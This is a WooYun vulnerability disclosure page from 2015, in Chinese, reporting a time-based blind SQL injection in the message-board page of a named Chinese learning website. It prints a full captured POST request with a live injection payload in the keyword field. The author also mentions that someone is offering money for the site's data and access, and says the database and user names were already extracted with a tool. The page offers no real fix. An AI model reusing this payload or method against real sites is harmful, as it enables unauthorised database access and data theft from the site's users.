当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093253

漏洞标题:StudyEZ学习网存在SQL注入

相关厂商:StudyEZ学习网

漏洞作者: XXXQQ

提交时间:2015-01-22 14:43

修复时间:2015-03-08 14:44

公开时间:2015-03-08 14:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

咨询中心首页存在post盲注,可以搞出数据

详细说明:

这个站点的数据量非常可观,有人出高价要数据和权限
手工确认存在时间盲注,直接工具跑
已经跑出数据库和用户名,时间盲注非常耗时,搞了好几个小时才出来

1.png


抓包内容如下,手工测试确实存在延迟盲注注入
post注入地址http://www.studyez.com/leaveword/default.aspx

POST /leaveword/default.aspx?page=9 HTTP/1.1
Content-Length: 9385
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.studyez.com:80/leaveWord/Default.aspx
Cookie: .EZANONYMOUS=KRSwNIUu0AEkAAAANGFkMzI1ZDgtZDdmYi00NWFkLWE1YjMtMDJkZDVmODkxNDA00
Host: www.studyez.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AspNetPagerAll=go&AspNetPagerAll_input=9&btnSearch=&btnToSubmit=&txtKeyWord=22');%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWBAKTwfPmCgLrvY/%2bBALeipm1AwKln/PuCromQaT6FaO3loeYC38mVHb0I/nT&__VIEWSTATE=/wEPDwUKLTc1ODc0NDk5Mw9kFgICAw9kFhACBQ8WBB4LXyFJdGVtQ291bnQCCB4HVmlzaWJsZWcWEGYPZBYCZg8VAxhTaG93TGVhdmVXb3JkLmFzcHg/SUQ9MTBF5oKo5aW977yB5oiR5Lus55qE5byA6K%2b%2b5LuY5qy%2b5pa55byP5pyJ5Yeg56eN77yf6YO95oCO5LmI5pSv5LuY5ZGi77yfJ%2baCqOWlve%2b8geaIkeS7rOeahOW8gOivvuS7mOasvuaWueW8j%2baciWQCAQ9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0zOR7or77nqIvop4bpopHlj6/lkKbkuIvovb3kuIvmnaUe6K%2b%2b56iL6KeG6aKR5Y%2bv5ZCm5LiL6L295LiL5p2lZAICD2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTIwaeekvuS8muW3peS9nOiAheiAg%2bivleaYr%2bS7gOS5iOaXtuWAmeaKpeWQje%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8nyfnpL7kvJrlt6XkvZzogIXogIPor5XmmK/ku4DkuYjml7blgJnmiqVkAgMPZBYCZg8VAxdTaG93TGVhdmVXb3JkLmFzcHg/SUQ9MxjlrabkuaDljaHlpoLkvZXlhYXlgLzvvJ8Y5a2m5Lmg5Y2h5aaC5L2V5YWF5YC877yfZAIED2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTE3SOS9oOWlve%2b8jOaIkeaDs%2befpemBkyAyMDEy5bm055uR55CG6ICD6K%2bVIOWVpeaXtuWAmeaKpeWQje%2b8n%2baIkeWMl%2bS6rOeahB3kvaDlpb3vvIzmiJHmg7Pnn6XpgZMgMjAxMuW5tGQCBQ9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0zMTPljJfkuqzmlZnluIjotYTmoLzogIPor5XmiqXlkI3ku4DkuYjml7blgJnlvIDlp4vvvJ8n5YyX5Lqs5pWZ5biI6LWE5qC86ICD6K%2bV5oql5ZCN5LuA5LmI5pe2ZAIGD2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTE2LjIwMTHlubTkvJrorqHogYznp7DogIPor5XmiqXlkI3mnaHku7bmnInlk6rkupsfMjAxMeW5tOS8muiuoeiBjOensOiAg%2bivleaKpeWQjWQCBw9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0yNIgBMjAxMuW5tOeOr%2bWig%2bW9seWTjeivhOS7t%2bW4iOeahOi%2bheWvvO%2b8jOeOsOWcqOWPr%2bS7peaKpeWQjeS6huWQl%2bOAguS6pOi/h%2bS4gOasoeWPguWKoOWfueiureeahOi0ueeUqO%2b8jOS7peWQjui/mOeUqOS6pOWFtuWug%2bi0ueeUqOWQl%2bOAgh8yMDEy5bm0546v5aKD5b2x5ZON6K%2bE5Lu35biI55qEZAIHDxYCHgRUZXh0ZWQCDQ8WAh8AAg4WHGYPZBYCZg8VAwIyNAbljLvlraYG5Yy75a2mZAIBD2QWAmYPFQMCMzAG5bel56iLBuW3peeoi2QCAg9kFgJmDxUDAjI5Bui0ouS8mgbotKLkvJpkAgMPZBYCZg8VAwIyOAblpJbotLgG5aSW6LS4ZAIED2QWAmYPFQMCMjYM5Y%2b45rOV6ICD6K%2bVDOWPuOazleiAg%2bivlWQCBQ9kFgJmDxUDAjE0CeWFrOWKoeWRmAnlhazliqHlkZhkAgYPZBYCZg8VAwIxNQblpJbor60G5aSW6K%2btZAIHD2QWAmYPFQMCMjUG6ICD56CUBuiAg%2beglGQCCA9kFgJmDxUDAzIzMQzmiJDkurrpq5jogIMM5oiQ5Lq66auY6ICDZAIJD2QWAmYPFQMCMjMM5a2m5piT6Z2i5o6IDOWtpuaYk%2bmdouaOiGQCCg9kFgJmDxUDAjE5BuiBjOS4mgbogYzkuJpkAgsPZBYCZg8VAwQxNDMzFeS4gOe6p%2bazqOWGjOiuoemHj%2bW4iBXkuIDnuqfms6jlhozorqHph4/luIhkAgwPZBYCZg8VAwM4NDMM5pWZ5biI6LWE5qC8DOaVmeW4iOi1hOagvGQCDQ9kFgJmDxUDAzgyMBLkvJjmg6DmtLvliqjkuJPpopgS5LyY5oOg5rS75Yqo5LiT6aKYZAIRDxYEHwACDx8BZxYeZg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzk2SeeOsOWcqOmDvTnmnIjkuK3ml6zkuobvvIznu4/mtY7luIjnsr7orrLnj63nmoTor77ku7bku4DkuYjml7blgJnmm7TmlrDvvJ9J546w5Zyo6YO9OeaciOS4reaXrOS6hu%2b8jOe7j%2ba1juW4iOeyvuiusuePreeahOivvuS7tuS7gOS5iOaXtuWAmeabtOaWsO%2b8nwQxMDI4CzA5LTEwIDE3OjIzKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPg/lrabmmJPlrablkZgyMTJkAgEPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM5NRLlpoLkvZXkuIvovb3or77ku7YS5aaC5L2V5LiL6L296K%2b%2b5Lu2BDExNjgLMDktMTAgMTc6MTEqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bDG5hbmF0dXR1MjAwOWQCAg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzg3SOS4uuS7gOS5iOaIkeW3sue7j%2bW8gOmAmuivvueoi%2b%2b8jOi/m%2bWFpeWQrOivvu%2b8jOWNtOaSreaUvuS4jeWHuuadpeWRou%2b8n0jkuLrku4DkuYjmiJHlt7Lnu4/lvIDpgJror77nqIvvvIzov5vlhaXlkKzor77vvIzljbTmkq3mlL7kuI3lh7rmnaXlkaLvvJ8EMTA0MwswOS0xMCAxNDoxMio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Hd2VpMTIxMmQCAw9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzg0ReaZrumAmuS6uuWRmOaAjuS5iOiDvea7oei2s%2bWPguWKoOW/g%2beQhuWSqOivouW4iOeahOiAg%2bivleimgeaxguWRou%2b8n0Xmma7pgJrkurrlkZjmgI7kuYjog73mu6HotrPlj4LliqDlv4PnkIblkqjor6LluIjnmoTogIPor5XopoHmsYLlkaLvvJ8EMTA5OQswOS0xMCAxMDowNio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4NcHNpbGxAMTI2LmNvbWQCBA9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzc4xAHpgKDku7cg55qE5oqA5pyv5LiO6K6h6YeP5omN6K6y5Yiw56ys5LqM56ug77yM6L%2bZ6KaB5Yiw5LuA5LmI5pe25YCZ5omN6IO95LiK5Lyg5a6M5ZWK77yM6L%2bY5LiA5Liq5pyI5bCx6ICD6K%2bV5LqG44CC6L%2bY5pyJ5YW25LuW56eR55qE5Lmg6aKY6Kej5p6Q54%2bt5Lmf5rKh5byA5aeL5ZGi77yM5YeG5aSH5LuA5LmI5pe25YCZ5byA5aeL5ZGi77yfcOmAoOS7tyDnmoTmioDmnK/kuI7orqHph4/miY3orrLliLDnrKzkuoznq6DvvIzov5nopoHliLDku4DkuYjml7blgJnmiY3og73kuIrkvKDlrozllYrvvIzov5jkuIDkuKrmnIjlsLHogIPor5XkuoYEMTI2NAswOS0wOSAyMTozMio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Hc3hoMjAxM2QCBQ9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzc3duaIkeecn%2beahOS4jeaYjueZveS6hizkuLrku4DkuYjml6for77nqIvmiJHlnKjljZXkvY3lsLHog73mlL7lh7rmnaUs6ICM6auY5riF55qE5Y%2bN5pS%2b5LiN5Ye65p2l5LqGLui2iuaUuei2iuiQveWQjuWQlz9s5oiR55yf55qE5LiN5piO55m95LqGLOS4uuS7gOS5iOaXp%2bivvueoi%2baIkeWcqOWNleS9jeWwseiDveaUvuWHuuadpSzogIzpq5jmuIXnmoTlj43mlL7kuI3lh7rmnaXkuoYu6LaK5pS56LaKAzkyMAswOS0wOSAyMDo1NSo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Jd2pqODgxOTMzZAIGD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNzPrA%2b%2b8iOS4gO%2b8ieaIkeaYqOWkqeS4iuWtpuaYk%2be9ke%2b8jOi/m%2bWFpeWHuueJiOS4k%2bS4mueQhuiuuuS4juWunuWKoe%2b8iOS4ree6p%2b%2b8ieeyvuiusuePree9kemhte%2b8jOaJk%2bW8gOaWsOWinueahOesrDE06K6y44CK5Lmm5YiK5b2i5oCB6K6%2b6K6h44CL77yM6KeB5pyJMS0xNOiusuiusuS5ieS%2bm%2bS4i%2bi9ve%2b8jOS9huaIkeaJk%2bWNsOWQjuWPkeeOsOivpeiusuS5ieacgOWQjuS4gOiusuS4uuesrDE16K6y77yM5L2G5YW25Lit57y656ysN%2bOAgTjjgIE544CBMTHlm5vorrLvvIzmnJvlrabmmJPnvZHlsL3ml6nooaXlhajjgIINCg0K77yI5LqM77yJ5pyA6L%2bR55yL55CG6K665LiO5a6e5Yqh77yI5Lit57qn77yJ57K%2b6K6y54%2bt6KeG6aKR77yM5Y%2bR546w572R6aG15LiK5omA5qCH5rOo55qE6K%2b%2b56iL5qyh5bqP5LiOUFBU6YeM5omA5qCH5rOo55qE6K%2b%2b56iL5qyh5bqP5LiN57uf5LiA44CC5pyA5aW96IO957uf5LiA6LW35p2l77yM5Lul5pa55L6/5a2m5ZGY44CCcu%2b8iOS4gO%2b8ieaIkeaYqOWkqeS4iuWtpuaYk%2be9ke%2b8jOi/m%2bWFpeWHuueJiOS4k%2bS4mueQhuiuuuS4juWunuWKoe%2b8iOS4ree6p%2b%2b8ieeyvuiusuePree9kemhte%2b8jOaJk%2bW8gOaWsOWinueahOesrAQxMTQxCzA5LTA5IDE2OjIwKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPgzmspnmvKDnlJjms4lkAgcPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM2Nz/lh7rniYjkuJPkuJrotYTmoLzmlZnmnZDmlrDniYjor77ku7bnnIvkuI3liLDop4bpopHvvIzmgI7kuYjlip4/5Ye654mI5LiT5Lia6LWE5qC85pWZ5p2Q5paw54mI6K%2b%2b5Lu255yL5LiN5Yiw6KeG6aKR77yM5oCO5LmI5YqeBDExMzkLMDktMDggMjA6MzUqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bEHpzX25qa2pAc29odS5jb21kAggPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM2MzzkuIDlu7rlhazot6/lrp7liqHnmoTkuaDpopjnj63or77nqIvmgI7kuYjmsqHmnInkuIrkvKDlkaLvvJ885LiA5bu65YWs6Lev5a6e5Yqh55qE5Lmg6aKY54%2bt6K%2b%2b56iL5oCO5LmI5rKh5pyJ5LiK5Lyg5ZGi77yfAzk1NQswOS0wOCAxNjo1OCo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4MemhhbmdndW9waW5nZAIJD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNjJ45Li65LuA5LmI5Lit57qn5Lya6K6h6IGM56ew6ICD6K%2bV5L%2bd6L%2bH54%2bt55qE6K%2b%2b56iL5LiK5Lyg55qE5aaC5q2k5oWi77yM5bey57uP5b6I5b%2br5bCx6KaB6ICD6K%2bV5LqG77yM6K%2b35bC95b%2br5LiK5Lyg44CCcuS4uuS7gOS5iOS4ree6p%2bS8muiuoeiBjOensOiAg%2bivleS/nei/h%2bePreeahOivvueoi%2bS4iuS8oOeahOWmguatpOaFou%2b8jOW3sue7j%2bW%2biOW/q%2bWwseimgeiAg%2bivleS6hu%2b8jOivt%2bWwveW/q%2bS4igM5NjYLMDktMDggMTY6MTAqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bEjM0MjQwMTE5NjgwODEzMTAyNmQCCg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03MzU4J%2baIkeimgeaYr%2bWQrOivvueahOivne%2b8jOW6lOivpeaAjuS5iOWQrCfmiJHopoHmmK/lkKzor77nmoTor53vvIzlupTor6XmgI7kuYjlkKwEMTA1MQswOS0wOCAxMTo1OCo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4J6JGj57Ky54S2ZAILD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNTJv5bu66K6%2b5bel56iL6YCg5Lu3566h55CG6L%2bZ6Zeo6K%2b%2b57K%2b6K6y54%2bt5aW95LmF6YO95rKh5pyJ5paw55qE6K%2b%2b5Lu25LiK5Lyg77yM6Zq%2b6YGT6KaB562J5Yiw6ICD6K%2bV5pe25omN5pyJ77yfb%2bW7uuiuvuW3peeoi%2bmAoOS7t%2beuoeeQhui/memXqOivvueyvuiusuePreWlveS5hemDveayoeacieaWsOeahOivvuS7tuS4iuS8oO%2b8jOmavumBk%2bimgeetieWIsOiAg%2bivleaXtuaJjeacie%2b8nwM5NjcLMDktMDcgMjA6MjcqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bCWxpeW9uZ190eWQCDA9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03MzQ0Y%2bivpeiAg%2bivleS6hu%2b8jOS4uuS7gOS5iOmrmOWuoeePreWuoeiuoeeQhuiuuuS4juahiOS%2bi%2bS4iuS8oOmCo%2bS5iOaFou%2b8jOWwseS4jeiDveS4iuS8oOW/q%2beCueWQl%2b%2b8n2Por6XogIPor5XkuobvvIzkuLrku4DkuYjpq5jlrqHnj63lrqHorqHnkIborrrkuI7moYjkvovkuIrkvKDpgqPkuYjmhaLvvIzlsLHkuI3og73kuIrkvKDlv6vngrnlkJfvvJ8DOTEyCzA5LTA3IDE1OjUxKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPhjljYPph4zkuYvooYzlp4vkuo7otrPkuItkAg0PZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzMzOD/ku4rlubTnu5/orqHku47kuJrlhoXpg6jotYTmlpnnmoTnrZTmoYjvvIzmgI7kuYjmsqHmnInop6PmnpDvvJ8/5LuK5bm057uf6K6h5LuO5Lia5YaF6YOo6LWE5paZ55qE562U5qGI77yM5oCO5LmI5rKh5pyJ6Kej5p6Q77yfAzg4NwswOS0wNyAxMDowNio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4IY21mNjcxMThkAg4PZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzMyNIwBMjAxMuW5tOe7n%2biuoeWfuuehgOW3peefpeivhuS4jue7n%2biuoeWunuWKoeOAguWGhemDqOi1hOaWmemHjOacgOWQjuS4gOmBk%2bmimOebrueahOacgOWQjuS4gOmBk%2bWwj%2bmimOebrueahOetlOahiOS4uuS7gOS5iOaYr0PvvIzogIzkuI3mmK/vvJ9qMjAxMuW5tOe7n%2biuoeWfuuehgOW3peefpeivhuS4jue7n%2biuoeWunuWKoeOAguWGhemDqOi1hOaWmemHjOacgOWQjuS4gOmBk%2bmimOebrueahOacgOWQjuS4gOmBk%2bWwj%2bmimOebrueahAM5ODILMDktMDYgMTQ6MjAqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bCGNtZjY3MTE4ZAITDw8WBB4QQ3VycmVudFBhZ2VJbmRleAIJHgtSZWNvcmRjb3VudAKqCWRkAhUPFgIfAmVkAhkPDxYEHwMCAR8EZmRkAhsPFgIfAgUqPHRyPjx0ZD7mmoLml6Dmu6HotrPmnaHku7bmlbDmja48L3RkPjwvdHI%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULYnRuVG9TdWJtaXQFCWJ0blNlYXJjaHrAzJrk9C%2bUdlBP4M%2b/%2bAHupQGU


工具跑出数据库和用户 直接上图 大家都看得懂啊

2.png


3.png


4.png

漏洞证明:

数据库都出来,接着跑数据库就行了

5.png

修复方案:

请自行修复

版权声明:转载请注明来源 XXXQQ@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝